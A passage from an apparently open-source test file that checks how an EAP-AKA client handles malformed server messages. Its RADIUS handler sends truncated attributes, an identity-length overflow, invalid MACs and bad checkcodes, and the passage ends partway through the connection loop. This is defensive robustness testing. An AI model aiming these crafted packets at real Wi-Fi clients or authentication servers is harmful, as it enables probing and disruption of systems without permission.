EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
    """EAP-AKA protocol tests"""
    def aka_handler(ctx, req):
        # Stateful handler: ctx['num'] counts requests generated so far and
        # each idx-matched branch below fires exactly once, in order. Most
        # invalid requests are followed by an EAP-Failure case so the next
        # connection attempt starts a fresh exchange.
        logger.info("aka_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256

        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_AKA)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_AKA, 255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Client Error")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short attribute header")
            return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated attribute")
            return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short attribute data")
            return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # Log message typo fixed: "unrecognzized" -> "unrecognized"
            logger.info("Test: Skippable/non-skippable unrecognized attribute")
            return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 10,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               255, 1, 0, 127, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request without ID type")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with BIDDING")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_BIDDING, 1, 0x8000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but no MAC")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but invalid MAC value")
            return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success with zero-key MAC")
            return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
                               ctx['id'] - 2,
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
                               EAP_SIM_AT_MAC, 5, 0,
                               0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
                               0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16384)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16385)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with unrecognized non-failure")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Re-authentication (unexpected) with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_CHECKCODE, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AKA Challenge with mismatching Checkcode value")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # Log message typo fixed: "claimin" -> "claiming"
            logger.info("Test: Re-authentication (unexpected) with Checkcode claiming identity round was used")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
                               0,
                               EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RAND length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RAND, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_AUTN length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_AUTN, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_PADDING")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_PADDING, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_NONCE_MT length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NONCE_MT, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_MAC length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_MAC, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_NOTIFICATION length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AT_IDENTITY overflow")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_IDENTITY, 1, 0xffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_SELECTED_VERSION length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_COUNTER")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_COUNTER, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_NONCE_S")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NONCE_S, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_IV length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_IV, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_ENCR_DATA length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RES length")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RES, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RES length")
            return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_AUTS length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_AUTS, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_CHECKCODE length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_CHECKCODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_RESULT_IND length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_RESULT_IND, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_KDF")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_BIDDING length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_BIDDING, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None

    srv = start_radius_server(aka_handler)
    if srv is None:
        return "skip"

    try:
        hapd = start_ap(apdev[0]['ifname'])

        for i in range(0, 49):
            # Round 11 also enables AKA' — presumably to reach the
            # AT_BIDDING challenge case in the handler; verify against the
            # handler sequence if the case numbering changes.
            eap = "AKA AKA'" if i == 11 else "AKA"
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap=eap, identity="0232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
